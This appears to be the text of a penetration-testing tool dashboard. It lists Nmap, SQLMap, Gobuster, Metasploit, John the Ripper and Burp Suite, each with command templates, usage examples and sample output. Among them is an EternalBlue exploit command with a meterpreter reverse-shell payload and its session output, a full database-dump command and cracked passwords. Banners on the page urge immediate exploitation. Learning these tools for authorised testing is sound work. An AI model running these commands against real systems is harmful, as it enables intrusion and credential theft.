PENETRATION TESTING ARSENAL

Real-World Security Assessment Platform

67 Vulnerabilities12 Active Scans

Critical Vulnerability Found

EternalBlue (MS17-010) detected on DC01.corporate.local (192.168.1.100). Remote code execution possible. Immediate exploitation recommended.

SQL Injection Confirmed

SQLMap identified critical SQL injection in vulnerable-app.com. Database access gained. Credential extraction in progress.

Professional Security Tools

Industry-standard penetration testing and security assessment tools

Nmap

Network discovery and security auditing

SCANNINGINFO

Command Template:

nmap -sS -sV -O -A {target}

Real Usage Example:

nmap -sS -sV -O -A -T4 --script=vuln 192.168.1.0/24

Stealth Rating:

6/10

Show Sample Output

Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-07 10:30 UTC
Nmap scan report for 192.168.1.100
Host is up (0.001s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5
80/tcp   open  http       Apache httpd 2.4.41
135/tcp  open  msrpc      Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds

Host script results:
|_smb-vuln-ms17-010: VULNERABLE:

SQLMap

Automatic SQL injection and database takeover tool

EXPLOITATIONCRITICAL

Command Template:

sqlmap -u '{url}' --dbs --batch

Real Usage Example:

sqlmap -u 'http://testphp.vulnweb.com/artists.php?artist=1' --dbs --tables --dump-all --batch

Stealth Rating:

3/10

Show Sample Output

[10:35:42] [INFO] testing connection to the target URL
[10:35:42] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:35:43] [INFO] testing if the parameter 'artist' is dynamic
[10:35:43] [INFO] confirming that parameter 'artist' is dynamic
[10:35:43] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be injectable
[10:35:43] [INFO] testing for SQL injection on GET parameter 'artist'
[10:35:43] [INFO] GET parameter 'artist' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s):
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 1=1

Gobuster

Directory/file brute-forcer written in Go

RECONNAISSANCEMEDIUM

Command Template:

gobuster dir -u {url} -w {wordlist}

Real Usage Example:

gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/big.txt -t 50

Stealth Rating:

7/10

Show Sample Output

===============================================================
Gobuster v3.6
===============================================================
[+] Url:                     http://192.168.1.100
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 200) [Size: 1834]
/backup               (Status: 301) [Size: 169] [--> http://192.168.1.100/backup/]
/config               (Status: 200) [Size: 0]
/phpmyadmin           (Status: 301) [Size: 169] [--> http://192.168.1.100/phpmyadmin/]
/uploads              (Status: 301) [Size: 169] [--> http://192.168.1.100/uploads/]

Metasploit Framework

Advanced penetration testing platform

EXPLOITATIONCRITICAL

Command Template:

use exploit/{module}; set RHOSTS {target}; exploit

Real Usage Example:

use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.1.100; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 192.168.1.10; exploit

Stealth Rating:

2/10

Show Sample Output

msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.10:4444 
[*] 192.168.1.100:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.100:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.100:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.1.100:445 - The target is vulnerable.
[*] 192.168.1.100:445 - Connecting to target for exploitation.
[+] 192.168.1.100:445 - Connection established for exploitation.
[*] Sending stage (200774 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.100:49158)

meterpreter >

John the Ripper

Password cracking tool

POST-EXPLOITATIONHIGH

Command Template:

john --wordlist={wordlist} {hashfile}

Real Usage Example:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT hash.txt

Stealth Rating:

8/10

Show Sample Output

Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (NT [MD4 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password123      (admin)
qwerty           (user1)
admin123         (administrator)
3g 0:00:00:12 DONE (2024-09-07 10:45) 0.2500g/s 8796Kp/s 8796Kc/s 26389KC/s
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

Burp Suite

Web application security testing platform

EXPLOITATIONHIGH

Command Template:

burpsuite --config-file={config}

Real Usage Example:

Intercept HTTP requests, perform manual and automated security testing

Stealth Rating:

9/10

Show Sample Output

Proxy Intercept: ON
Intercepted request:
POST /login.php HTTP/1.1
Host: vulnerable-app.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

username=admin&password=test

Scanner Results:
[HIGH] SQL injection in 'username' parameter
[MEDIUM] Cross-site scripting (XSS) in 'search' parameter
[INFO] Directory listing enabled on /backup/